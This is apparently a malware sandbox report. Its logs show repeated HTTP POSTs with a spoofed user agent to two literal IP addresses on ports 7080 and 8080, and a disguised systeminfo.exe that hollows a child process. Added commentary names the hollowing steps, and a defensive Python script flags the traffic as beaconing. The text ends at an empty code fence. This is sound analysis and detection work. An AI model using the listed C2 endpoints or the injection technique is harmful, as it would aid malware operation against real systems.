Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #13
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #14
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #15
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #16
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #17
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #18
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #19
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #20
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 159.203.94.198
Server Port 8080
Data Sent 0.33 KB (335 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 159.203.94.198, server_port = 8080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 159.203.94.198 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 1
Fn
HTTP Session #21
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
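The session blocks above are the kind of record an analyst turns into a quick beaconing check: every request is a plain-HTTP POST to a literal IP address on a port other than 80/443, the request size is constant, and the WinINet flags avoid leaving cache entries, cookies or UI. The following is an added example, not VMRay code and not part of the report: it parses the flattened "Information Value" rows of three of the sessions above (copied by hand into a constructed string, user agent abbreviated), groups them by server and port, and lists the traits that make an endpoint worth blocking. The port list, the repeat threshold and the flag descriptions are this editor's assumptions, not values from the report.

```python
"""Triage helper for VMRay-style 'HTTP Session' blocks (added example, not VMRay code)."""
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample: sessions #19-#21 copied from the report above; the user
# agent is abbreviated. Real reports carry more rows per block.
SAMPLE_REPORT = """\
HTTP Session #19
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
HTTP Session #20
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0)
Server Name 159.203.94.198
Server Port 8080
Data Sent 0.33 KB (335 bytes)
Data Received 0.15 KB (156 bytes)
HTTP Session #21
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
"""

_FIELD = re.compile(r"^(User Agent|Server Name|Server Port|Data Sent|Data Received) (.+)$")
_BYTES = re.compile(r"\((\d+) bytes\)")
COMMON_WEB_PORTS = {80, 443}  # assumption: any other port gets a second look


def parse_sessions(report):
    """Split the flattened text into one dict per 'HTTP Session #n' block."""
    sessions, cur = [], None
    for line in report.splitlines():
        if line.startswith("HTTP Session #"):
            cur = {"id": int(line.rsplit("#", 1)[1])}
            sessions.append(cur)
            continue
        m = _FIELD.match(line)
        if cur is None or m is None:
            continue
        key, val = m.groups()
        if key == "Server Port":
            cur["port"] = int(val)
        elif key == "Server Name":
            cur["server"] = val
        elif key == "User Agent":
            cur["ua"] = val
        else:  # Data Sent / Data Received: keep the exact byte count, not the KB figure
            cur["sent" if key == "Data Sent" else "recv"] = int(_BYTES.search(val).group(1))
    return sessions


def is_literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def endpoint_summary(sessions):
    """Group sessions by server:port, counting requests and their sizes."""
    summary = defaultdict(lambda: {"count": 0, "sent": Counter(), "recv": Counter()})
    for s in sessions:
        ep = "%s:%d" % (s["server"], s["port"])
        summary[ep]["count"] += 1
        summary[ep]["sent"][s["sent"]] += 1
        summary[ep]["recv"][s["recv"]] += 1
    return dict(summary)


def beacon_indicators(sessions, min_repeats=2):
    """Return {endpoint: [reasons]} for endpoints that look like C2 check-ins."""
    findings = {}
    for ep, info in endpoint_summary(sessions).items():
        host, port = ep.rsplit(":", 1)
        reasons = []
        if is_literal_ip(host):
            reasons.append("server is a literal IP, so there is no DNS lookup to catch")
        if int(port) not in COMMON_WEB_PORTS:
            reasons.append("plain HTTP on non-standard port " + port)
        size, n = info["sent"].most_common(1)[0]
        if n >= min_repeats and len(info["sent"]) == 1:
            reasons.append("%d requests of identical size (%d bytes)" % (n, size))
        if reasons:
            findings[ep] = reasons
    return findings


# Editor's reading of the WinINet request flags shown on every session above
# (semantics as documented for HttpOpenRequest; the report itself says nothing about them).
FLAGS_OF_NOTE = {
    "INTERNET_FLAG_NO_UI": "suppresses any dialog the user might notice",
    "INTERNET_FLAG_NO_CACHE_WRITE": "leaves no entry in the WinINet cache on disk",
    "INTERNET_FLAG_NO_COOKIES": "keeps the request out of the user's cookie store",
    "INTERNET_FLAG_RELOAD": "always goes to the server, never to a cached copy",
}


def noteworthy_flags(flags_field):
    """'flags = A, B, C' -> [(flag, why it matters)] for the flags worth noting."""
    names = [t.strip() for t in flags_field.split("=", 1)[1].split(",")]
    return [(n, FLAGS_OF_NOTE[n]) for n in names if n in FLAGS_OF_NOTE]


if __name__ == "__main__":
    for ep, why in beacon_indicators(parse_sessions(SAMPLE_REPORT)).items():
        print(ep, "->", "; ".join(why))
```

Run against the full report, 173.201.20.6:7080 is reported with all three traits (fifteen identical 331-byte POSTs) and 159.203.94.198:8080 with the first two; both are candidates for an egress block and a retro-hunt in proxy logs, where the constant request size and the hard-coded MSIE 7.0 user agent are the searchable features.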
Process #9: systeminfo.exe
(Host: 48, Network: 0)
Information Value
ID #9
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
Information Value
PID 0x674
Parent PID 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9E4
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False
locale.nls 0x00110000 0x00176fff Memory Mapped File Readable False False False
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x00418fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000590000 0x00590000 0x0060ffff Private Memory Readable, Writable True False False
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False
private_0x0000000000880000 0x00880000 0x009fffff Private Memory Readable, Writable True False False
pagefile_0x0000000000a00000 0x00a00000 0x00b87fff Pagefile Backed Memory Readable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x00d80fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000d90000 0x00d90000 0x0218ffff Pagefile Backed Memory Readable True False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 address = 0x400000, size = 102400 True 1
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 address = 0x7efde008, size = 4 True 1
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 address = 0x7efdf010, size = 4 True 1
Modify Control Flow #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 os_tid = 0x9e4, address = 0x0 True 1
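The four injection rows above are worth reading together. Process #7 (the same systeminfo.exe image) writes 102400 bytes (0x19000) into this child at 0x400000, which is exactly the size of the Readable, Writable, Executable region private_0x0000000000400000 (0x00400000 to 0x00418fff) in the region table; it then writes 4 bytes at 0x7efde008 and 0x7efdf010 and finally modifies the control flow of thread 0x9e4, the child's only thread. On a WOW64 process under Windows 7 x64 the 32-bit PEB sits at 0x7efde000 with ImageBaseAddress at offset 0x8 and the 64-bit PEB at 0x7efdf000 with ImageBaseAddress at offset 0x10, so the two small writes land on the image-base field of both PEBs; that layout is this editor's interpretation, not something the report states. Taken together, this is the textbook process-hollowing sequence: map a new image into a suspended copy of yourself, repoint the PEB at it, redirect the main thread. The following is an added example, not VMRay code: it takes those rows (re-typed by hand, as a constructed list) and scores them against that pattern. The PEB offsets, the 64 KiB image-base alignment test and the minimum write size are assumptions and are exposed as parameters.

```python
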